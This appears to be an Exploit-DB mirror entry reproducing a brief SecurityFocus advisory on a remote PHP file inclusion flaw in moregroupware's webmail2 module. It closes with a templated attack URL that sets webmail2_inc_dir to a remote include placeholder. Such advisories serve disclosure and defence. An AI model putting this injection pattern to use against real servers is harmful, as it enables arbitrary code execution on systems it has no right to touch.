exploit-db-mirror/exploits/php/webapps/22948.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

5 lines
No EOL
613 B
Text

source: https://www.securityfocus.com/bid/8249/info
moregroupware is prone to a vulnerability that may permit remote attackers to include and execute malicious PHP scripts. Remote users, under some PHP configurations, may influence a moregroupware URI variable. This variable is used in the include path for several moregroupware configuration scripts. By influencing the include path so that it points to a malicious PHP script on a remote system, it is possible to cause arbitrary PHP code to be executed.
http://www.example.com/moregroupware/modules/webmail2/inc/[vuln file]?webmail2_inc_dir=[remote include]